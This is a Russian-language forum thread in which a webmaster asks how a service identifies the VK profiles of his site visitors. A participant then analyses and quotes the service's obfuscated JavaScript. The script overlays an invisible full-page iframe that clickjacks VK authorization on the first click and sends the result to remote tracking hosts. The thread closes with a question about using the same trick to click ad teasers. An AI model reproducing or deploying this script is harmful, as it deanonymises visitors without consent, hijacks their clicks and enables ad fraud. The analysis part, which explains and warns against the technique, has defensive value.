Sign in to follow this  
Followers 0
Zalm

Как работает определение страницы пользователя?!

16 posts in this topic

Добрый вечер всем! Хотел бы задать очень интересный вопрос. Есть система SocFishing называется, я ссылку не даю, что бы не подумали что реклама. Так вот, она какими-то образом определяет страницу человека, который пришел ко мне на сайт. Даже если этот человек пришел прямым заходом, или вовсе пришел из поисковой системы. То есть главный вопрос в том, как она устанавливает связь между каким либо пользователем пришедшим на мой сайт и его страницей? как это возможно?

 

e7044f04ec493150e3dfb8b8ce5ff19f.png

Share this post


Link to post
Share on other sites

В интернете нет никаких дискуссий на тему того, как это работает в техническом плане, я ни сайта ни ссылки не дал.

Мне интересно сугубо техническая сторона)

Если бы я рекламировал, то наверняка никто просто так не стал бы раскрывать инфу как это все работает) а я как раз это и ищу)

 

Есть предположения как это может работать?

 

2ce239b08cb0e216b45ff33451e516dd.png

Вот все то единственное что эта система шлет на сервер. Никаких догадок нет  :o  :(

Share this post


Link to post
Share on other sites

А источник (соц. принадлежность) только для контака(vk.com)? Т.е. только из этой системы подбирает профиля?

Данные о переходе смотреть без смысла - из социалки да, будет refer и то не изо всех, да и тут итак все ясно(куку другого домена, как знаете из-за security police получить не выйдет). Другой конечно вопрос - переход директовый или из выдачи п.с. В голову крадутся параноидальные данные о труЪ хацкере или уязвимости API vk но мне кажется все проще - может быть данные "рандомые"? 

Конечно хотелось бы глянуть код, который может определять подобный фактор. Возможно очередная уязвимость, недавно была инфа о том(на хабре) что vk API отдает реальный никнейм пользователя в случае клик-джекинга через javascript (т.е. без авторизации возвращает данные пользователя) - возможно дело зарыто здесь. 

Lyamov likes this

Share this post


Link to post
Share on other sites

А источник (соц. принадлежность) только для контака(vk.com)? Т.е. только из этой системы подбирает профиля?

Данные о переходе смотреть без смысла - из социалки да, будет refer и то не изо всех, да и тут итак все ясно(куку другого домена, как знаете из-за security police получить не выйдет). Другой конечно вопрос - переход директовый или из выдачи п.с. В голову крадутся параноидальные данные о труЪ хацкере или уязвимости API vk но мне кажется все проще - может быть данные "рандомые"? 

Конечно хотелось бы глянуть код, который может определять подобный фактор. Возможно очередная уязвимость, недавно была инфа о том(на хабре) что vk API отдает реальный никнейм пользователя в случае клик-джекинга через javascript (т.е. без авторизации возвращает данные пользователя) - возможно дело зарыто здесь. 

Работает только для VK, но в рекламе у них написано что затем будут подключены и другие соц сети как фейс бук и ОД и все остальное.

Данные НЕ РАНДОМНЫЕ, это реально те кто заходил на сайт, я им писал, и они действительно там были! Как раз из-за этого и появился горячий интерес к техническому моменту как же это может работать, рабочий код можете посмотреть на сайте:

 

kupit - duhi - msk . ru  пробелы только убрать

 

В самом низу страницы стоит этот код

Share this post


Link to post
Share on other sites

Вот они новые технологии! 

В будущем планирую создать свой порно сайт, ух будет весело увидеть там своих друзей, знакомых  :lol:

Share this post


Link to post
Share on other sites

Пришла заманчивая идея, ради интереса и фана сейчас отпишу в support VK) что они скажут интересно)

Share this post


Link to post
Share on other sites

Работает только для VK, но в рекламе у них написано что затем будут подключены и другие соц сети как фейс бук и ОД и все остальное.

Данные НЕ РАНДОМНЫЕ, это реально те кто заходил на сайт, я им писал, и они действительно там были! Как раз из-за этого и появился горячий интерес к техническому моменту как же это может работать, рабочий код можете посмотреть на сайте:

 

kupit - duhi - msk . ru  пробелы только убрать

 

В самом низу страницы стоит этот код

Да, это кликджэкинг (просмотрел стек сетевого обмена - первый клик по сайту инициирует определенный скрипт).

Ща разкалупаю код да узнаем чего он там умного делает  :)  На первый взгляд - именно та уязвимость vk (а мб и фича как ее на хабре прозвали, к сожалению статью найти не могу).

Share this post


Link to post
Share on other sites

Да, это кликджэкинг (просмотрел стек сетевого обмена - первый клик по сайту инициирует определенный скрипт).

Ща разкалупаю код да узнаем чего он там умного делает  :)  На первый взгляд - именно та уязвимость vk (а мб и фича как ее на хабре прозвали, к сожалению статью найти не могу).

 

Да я кстати замечал не приятное ощущение, что при первом заходе страница сама перезагружается! Интересно влияет ли этот как-то на мнение о сайте у Яндекса? Чувствую дело пахнет жареным, день подожду и наверное нужно убрать такой код, а то еще в бан попаду

Share this post


Link to post
Share on other sites

Да я кстати замечал не приятное ощущение, что при первом заходе страница сама перезагружается! Интересно влияет ли этот как-то на мнение о сайте у Яндекса? Чувствую дело пахнет жареным, день подожду и наверное нужно убрать такой код, а то еще в бан попаду

Я бы не советовал далее использовать эту штуку.

Вот вам мое "расследование":

1. Выставлен фрейм во весь сайт с "уехавшим" индексом https://yadi.sk/i/ZLOG_KX1YvRmz

2. По клику - идет типичный запрос авторизации, скрываясь во фрейме. После чего на удаленный хост идет запрос с отправкой данных.

Обработчик:

 function console_out(str) { console.log("SFLog: "+str); }  console_out("loader v0.3");  console_out("1947");  console_out("9213");  console_out("9811");  console_out("7314");  console_out("5745");  console_out("5848");  console_out("7372");  console_out("6521");  console_out("2262");  console_out("9673");  console_out("8312"); 	(function(){ var c = "noindex"; var _0x5e2b=["\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x72\x65\x6D\x6F\x76\x65\x43\x68\x69\x6C\x64","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];setTimeout(function (){var _0x5525x1=document[_0x5e2b[0]](c);while(_0x5525x1[_0x5e2b[3]]){_0x5525x1[0][_0x5e2b[2]][_0x5e2b[1]](_0x5525x1[0]);} ;} ,50); eval(_0x5e2b); }());
	if( navigator.userAgent.match( "Android|BackBerry|phone|iPad|iPod|IEMobile|Nokia|Mobile|MSIE|iPhone|webOS|Windows Phone|Explorer|Trident" )  )  {
	mnoload = false; console_out('7422'); } else { mnoload = true; console_out('9418'); }
	isSafari = !!navigator.userAgent.match(/Version\/[\d\.]+.*Safari/); if (isSafari) { mnoload = false; console_out('5743'); }
	if (!navigator.cookieEnabled) { mnoload = false; }

	function are_cookies_enabled() {
	var cookieEnabled = (navigator.cookieEnabled) ? true : false;
	if (typeof navigator.cookieEnabled == "undefined" && !cookieEnabled) { 
		document.cookie="sfload";
		cookieEnabled = (document.cookie.indexOf("sfload") != -1) ? true : false;
	}
	return (cookieEnabled);
	}

	if (!are_cookies_enabled()) {
		mnoload = false;
	}

	iframe_url = 'data:text/html;charset=utf-8;base64,PCEtLSBzb2NmaXNoaW5nIHJlbG9hZCAtLT48bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vZm9sbG93IiAvPjxzY3JpcHQgYXN5bmM+IGlmKCIiIT13aW5kb3cucmVmZXJyZXIpIHsgY29uc29sZS5sb2coIlNGTG9nOiA5MDE0Iik7IHdpbmRvdy5sb2NhdGlvbi5ocmVmPSJodHRwczovL3Vjb3otaG9zdC5ydS9zaXRlaGlqYWNrLz91PTgzMmIyOWNmYWZiYjA0YTQ5ZjZiZGFhZjZjYzUyYjQ2ZjNlYzg0YzhmMDdjNDRiYzgyMmZiMWU1ZWYyZmIwODcmaG9zdD1kYjZmMzhkY2Y3ZjE0ZWE5ZDMyM2Q2ZWMyNTkxNjk0YmZlZjZkZmQ4YWMzMzUwZmEmdWlkPWE2NjVjZjU5M2IwYzM0MzRiYTM1ZjBiNWQ1NDY0NWFhMTIxMGFlMDMyNDI5MjQxYzBjZjI5MjkwYTM2NWQ4MWE3OWY4N2I3MTlmOGZjOTMxNjRlMzFjNWQ4Y2ZhODhkYWViOTEwNDBjYThlMjBmOTU4MTU3M2Q0OTQyYjY1NGJiNDAxYWU3ZDg2MDI1OGQ4MWIyNTZhY2MyZGZlZjE0MjM2ZGQ0ZGJjM2NiYzZiZmZhZTZiM2JhZWM4NjRmODI4YTZiNTgxMjc3YWY1ZTdhYWEwOGFiMTc5NiI7IH0gZWxzZSB7IHdpbmRvdy5sb2NhdGlvbi5ocmVmPSJkYXRhOnRleHQvaHRtbDtjaGFyc2V0PXV0Zi04O2Jhc2U2NCxQQ0V0TFNCVFJpQXRMVDQ4YzJOeWFYQjBQbU52Ym5OdmJHVXViRzluS0NkVFJreHZaem9nTlRJek1TY3BPM2RwYm1SdmR5NXNiMk5oZEdsdmJpNW9jbVZtUFNkb2RIUndjem92TDNOdlkyZGhkR1V1Y25VdmRISmhZMnN2ZG10ZmMyVnVaQzV3YUhBbk96d3ZjMk55YVhCMFBqd2hMUzBnVTBZZ0xTMCsiOyB9IDwvc2NyaXB0PjwhLS0gc29jZmlzaGluZyByZWxvYWQgLS0+';
	if( mnoload ) {
		console_out('1388');
		document.oncontextmenu = new Function("return false;");

		var sf = document.createElement('div');
		sf.innerHTML = '<iframe src="'+iframe_url+'" name="SFrmload" id="SFrmload" frameborder="no" scrolling="no" allowtransparency style="position:fixed; top:0px; left:0px; bottom:0px; right:0px; width:100%; height:100%; border:none; margin:0; padding:0; filter:alpha(opacity=1); opacity:1; cursor: pointer; z-index:88888;" /><\/iframe>'; 
		(document.getElementsByTagName('html')[0] || document.body).appendChild( sf );
		sf = document.getElementById("SFrmload");
		sf.parent = undefined;
 
 		/** 
 		onload = function () {
			console_out('3640');
			var sf = document.createElement('div');
			sf.innerHTML = '<iframe src="'+iframe_url+'" name="SFrmload" id="SFrmload" frameborder="no" scrolling="no" allowtransparency style="position:fixed; top:0px; left:0px; bottom:0px; right:0px; width:100%; height:100%; border:none; margin:0; padding:0; filter:alpha(opacity=0); opacity:0; cursor: pointer; z-index:88888;" /><\/iframe>'; 
			document.body.appendChild( sf );

			sf = document.getElementById("SFrmload");
			sf.parent = undefined;
			console_out('1497');
		} 
		**/
	}

	onmessage = function(evnt) {
		if (evnt.data=='patched') {
			document.getElementById('SFrmload').style.visibility = "hidden";
			document.getElementById("SFrmload").style.height = "1px";
			document.getElementById("SFrmload").style.width = "1px";
			console_out('9949');
		}
	}

 

Поколупав код вы без проблем найдете куда и что он отправляет, пример:

<!-- SF --><script>console.log('SFLog: 5231');window.location.href='https://socgate.ru/track/vk_send.php';</script><!-- SF -->

или

https://ucoz-host.ru/sitehijack/?u=832b29cfafbb04a49f6bdaaf6cc52b46f3ec84c8f07c44bc822fb1e5ef2fb087&host=db6f38dcf7f14ea9d323d6ec2591694bfef6dfd8ac3350fa&uid=a665cf593b0c3434ba35f0b5d54645aa1210ae032429241c0cf29290a365d81a79f87b719f8fc93164e31c5d8cfa88daeb91040ca8e20f9581573d4942b654bb401ae7d860258d81b256acc2dfef14236dd4dbc3cbc6bffae6b3baec864f828a6b581277af5e7aaa08ab1796

В последнем данные похожи на некий XOR-алгоритм двухстороннего шифрования (обратимого шифра), который если уж вам слишком припекает можно и подобрать, у меня не стоит на байтовый анализ алгоритма, честно, давно завязал с этим  :D

Ответ: откуда взялись данные? С уязвимости/фичи ВК. Как благодарить за разъяснение думаю знаете )

Legran and Zalm like this

Share this post


Link to post
Share on other sites

У вк в апи есть кнопка авторизация на сайте, работает через javascript. Вот берется эта кнопка делается прозрачной и цепляется к мышке. Когда пользователь делает первый клик на сайте сам того не зная кликает по этой кнопке и происходит авторизация через контакт.

В супорте контакта такую возможность багом не считают.

Share this post


Link to post
Share on other sites

Я бы не советовал далее использовать эту штуку.

Почему? Она будет плохо влиять на сайт для яндекса? Судя по тому что я понял из объяснения, это тот же попандер(в глазах яндекса) только более крутой и не заметный? 

 

 

У вк в апи есть кнопка авторизация на сайте, работает через javascript. Вот берется эта кнопка делается прозрачной и цепляется к мышке. Когда пользователь делает первый клик на сайте сам того не зная кликает по этой кнопке и происходит авторизация через контакт.

В супорте контакта такую возможность багом не считают.

Выходит так можно и к другим сервисам сделать? или нет?

Share this post


Link to post
Share on other sites

 

Почему? Она будет плохо влиять на сайт для яндекса? Судя по тому что я понял из объяснения, это тот же попандер(в глазах яндекса) только более крутой и не заметный? 

 

 

Выходит так можно и к другим сервисам сделать? или нет?

 

Явно поисковики будут не восторге от подобных скриптов, по сути кликандер который по тихой что-то там делает.

Не знаю насчет других, все зависит от того есть ли у них подобные виджеты.  

Вот он "Виджет для авторизации" - http://vk.com/dev/Auth Фишка в том что он не спрашивает разрешения у пользователя.

Share this post


Link to post
Share on other sites

Явно поисковики будут не восторге от подобных скриптов, по сути кликандер который по тихой что-то там делает.

Не знаю насчет других, все зависит от того есть ли у них подобные виджеты.  

Вот он "Виджет для авторизации" - http://vk.com/dev/Auth Фишка в том что он не спрашивает разрешения у пользователя.

Да я выше об этом и писал. Была где то статья на хабре недавно об этой уязвимости, где позже саппорт контагта назвал ее "фичей" и умельцы начали активно практиковать кликджэкинг )

Share this post


Link to post
Share on other sites

Да я выше об этом и писал. Была где то статья на хабре недавно об этой уязвимости, где позже саппорт контагта назвал ее "фичей" и умельцы начали активно практиковать кликджэкинг )

Ну, на лендинги можно ставить значит) 

 

Интересно а можно ли такими способами на тизеры кликнуть или на любой другой рекламный iframe?) :rolleyes:

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0

  • Recently Browsing   0 members

    No registered users viewing this page.